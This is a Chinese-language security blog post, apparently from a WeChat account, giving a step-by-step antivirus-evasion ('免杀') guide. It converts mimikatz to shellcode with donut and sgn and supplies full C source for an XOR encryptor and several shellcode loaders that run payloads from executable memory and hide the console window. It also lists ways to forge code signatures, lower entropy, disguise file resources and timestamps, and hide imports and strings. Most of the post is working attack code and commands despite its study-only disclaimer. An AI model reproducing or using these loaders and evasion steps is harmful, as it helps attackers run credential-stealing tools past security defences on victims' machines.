关注并星标🌟 一起学安全❤️
作者:coleak
首发于公号:渗透测试安全攻防
字数:4421
声明:仅供学习参考,请勿用作违法用途
目录
-
前记
-
降本增效式免杀
-
shellcode过静态
-
loader加载
-
签名
-
减熵
-
文件伪装
-
混淆源代码
-
导入隐藏
-
字符串隐藏
-
后记
-
Hide Dos windows
-
常规读文件loader
前记
针对c语言编写的工具,可以转化为shellcode并编写packer以降本增效
降本增效式免杀
先对mimikatz进行shellcode化
donut.exe -i mimikatz.exe -a 2 -e 2
shellcode过静态
sgn.exe -i loader.bin -a 64 -c 6 -M 1 -o cc.bin
然后对sgn混淆的文件进行加密
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include<string.h>
int main() {
//write
FILE* file2 = NULL;
char path2[] = "c1.bin";
//read
fopen_s(&file2, path2, "wb");
FILE* file = NULL;
char path[] = "cc.bin";
fopen_s(&file, path, "rb");
fseek(file, 0, SEEK_END);
int filelen = ftell(file);
fseek(file, 0, SEEK_SET);
char* buf = (char*)VirtualAlloc(NULL, filelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
fread(buf, 1, filelen, file);
//jiami
int a = 88; unsigned char jiami;
unsigned char tmp;
int b = 0;
srand(a);
for (int i = 0; i < filelen; i++) {
b = rand() % 9 + 1;//1-9
jiami = b ^ buf[i];
fwrite(&jiami, sizeof(unsigned char), 1, file2);
}
fclose(file);
fclose(file2);
system("pause");
return 0;
}
loader加载
这里放一个简单的内存中解密加载
#include <stdio.h>
#include <Windows.h>
#include<string.h>
void jisuan(int i) {
for (int j = 0; j < i; j++)
printf("%dn", j);
}
int main(int argc, char* argv[])
{
if (argc == 2)
{
char k[] = "998";
if (strcmp(argv[1], k) == 0) {
int a = 88;//key
FILE* file = NULL;
char path[] = "c1.bin";
fopen_s(&file, path, "rb");
fseek(file, 0, SEEK_END);
int filelen = ftell(file);
fseek(file, 0, SEEK_SET);
char* buf = (char*)VirtualAlloc(NULL, filelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
fread(buf, 1, filelen, file);
int b;
srand(a);
for (int i = 0; i < filelen; i++)
{
b = rand() % 9 + 1;//1-9
buf[i] = buf[i] ^ b;
}
void* p;
((void(*)())buf)();
}
else {
jisuan(88);
}
}
else
{
jisuan(100);
}
return 0;
}
签名
sigthief.py伪造
signtool不受信任
减熵
Junkcode添加垃圾量
更换编码方式(uuid,mac,ipv4,ipv6)
添加资源文件
文件伪装
resource hacker,直接导出正常文件的RES,导入到loader中
rcedit
修改创建、写入日期(newfiletime)
混淆源代码
ollvm(Instructions Substitution(指令替换)、Bogus Control Flow(混淆控制流)、Control Flow Flattening(控制流平展)
实际用处不大,但是可以增加杀软云端逆向分析人员的工作量,加长免杀时间
导入隐藏
动态获取调用api
导入lazy_importer库
字符串隐藏
字符串数组分割赋值
导入现成的字符串混淆库
效果测试
后记
Hide Dos windows
预处理
#include<windows.h>
#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"" ) // 设置入口地址
int main()
{
MessageBoxA(NULL, "Hello", "Notice", NULL);
return 0;
}
API实现
#include<windows.h>
void HideWindow() {
HWND hwnd = GetForegroundWindow();
if (hwnd) {
ShowWindow(hwnd, SW_HIDE);
}
}
int main()
{
HideWindow();
int a = 10;
return 0;
}
#include<windows.h>
int main()
{
FreeConsole();
int a = 10;
return 0;
}
常规读文件loader
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include<string.h>
int main(int argc, char* argv[])
{
FILE* file = NULL;
char path[] = "loader.bin";
fopen_s(&file, path, "rb");
fseek(file, 0, SEEK_END);
int filelen = ftell(file);
fseek(file, 0, SEEK_SET);
char* buf = (char*)VirtualAlloc(NULL, filelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
fread(buf, 1, filelen, file);
void* p;
((void(*)())buf)();
return 0;
}
或者
#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"" )
int main()
{
HANDLE bin = CreateFileA("loader.bin", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
DWORD64 bin_size = GetFileSize(bin, NULL);
LPVOID bin_bytes = VirtualAlloc(NULL, bin_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
DWORD out_size = 0;
ReadFile(bin, bin_bytes, bin_size, &out_size, NULL);
DWORD tmp;
VirtualProtect(bin_bytes, sizeof(bin_bytes), PAGE_EXECUTE_READWRITE, &tmp);
((void(*)())bin_bytes)();
CloseHandle(bin);
return 0;
}
文章首发于:渗透测试安全攻防
原文始发于微信公众号(渗透测试安全攻防):降本增效式免杀指南(一)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论